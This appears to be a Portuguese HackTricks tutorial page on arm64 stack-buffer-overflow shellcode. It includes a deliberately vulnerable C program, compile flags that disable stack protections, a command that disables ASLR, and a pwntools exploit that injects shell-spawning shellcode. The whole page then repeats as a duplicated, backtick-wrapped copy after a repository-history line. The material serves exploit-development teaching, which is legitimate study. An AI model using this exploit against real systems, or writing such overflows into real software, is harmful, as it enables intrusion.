hacktricks/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md

# Stack Shellcode - arm64

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}

Encontre uma introdução ao arm64 em:

{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
{% endcontent-ref %}

## Código&#x20;
```c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}
```
Compile sem pie, canário e nx:

{% code overflow="wrap" %}
```bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```
{% endcode %}

## Sem ASLR  & Sem canário - Stack Overflow&#x20;

Para parar o ASLR, execute:
```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```
Para obter o [**offset do bof verifique este link**](../ret2win/ret2win-arm64.md#finding-the-offset).

Exploit:
```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```
A única coisa "complicada" de encontrar aqui seria o endereço na pilha para chamar. No meu caso, eu gerei o exploit com o endereço encontrado usando gdb, mas depois, ao explorá-lo, não funcionou (porque o endereço da pilha mudou um pouco).

Eu abri o **`core` file** gerado (`gdb ./bog ./core`) e verifiquei o endereço real do início do shellcode.

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
Recreating repository history for branch pt 2024-12-12 12:56:11 +00:00			`# Stack Shellcode - arm64`

			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`

			`</details>`
			`{% endhint %}`

			`Encontre uma introdução ao arm64 em:`

			`{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}`
			`[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)`
			`{% endcontent-ref %}`

			`## Código `
			```c
			`#include <stdio.h>`
			`#include <unistd.h>`

			`void vulnerable_function() {`
			`char buffer[64];`
			`read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability`
			`}`

			`int main() {`
			`vulnerable_function();`
			`return 0;`
			`}`
			```
			`Compile sem pie, canário e nx:`

			`{% code overflow="wrap" %}`
			```bash
			`clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack`
			```
			`{% endcode %}`

			`## Sem ASLR & Sem canário - Stack Overflow `

			`Para parar o ASLR, execute:`
			```bash
			`echo 0 \| sudo tee /proc/sys/kernel/randomize_va_space`
			```
			`Para obter o [offset do bof verifique este link](../ret2win/ret2win-arm64.md#finding-the-offset).`

			`Exploit:`
			```python
			`from pwn import *`

			`# Load the binary`
			`binary_name = './bof'`
			`elf = context.binary = ELF(binary_name)`

			`# Generate shellcode`
			`shellcode = asm(shellcraft.sh())`

			`# Start the process`
			`p = process(binary_name)`

			`# Offset to return address`
			`offset = 72`

			`# Address in the stack after the return address`
			`ret_address = p64(0xfffffffff1a0)`

			`# Craft the payload`
			`payload = b'A' * offset + ret_address + shellcode`

			`print("Payload length: "+ str(len(payload)))`

			`# Send the payload`
			`p.send(payload)`

			`# Drop to an interactive session`
			`p.interactive()`
			```
			`A única coisa "complicada" de encontrar aqui seria o endereço na pilha para chamar. No meu caso, eu gerei o exploit com o endereço encontrado usando gdb, mas depois, ao explorá-lo, não funcionou (porque o endereço da pilha mudou um pouco).`

			Eu abri o `core` file gerado (`gdb ./bog ./core`) e verifiquei o endereço real do início do shellcode.

			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`
			`{% endhint %}`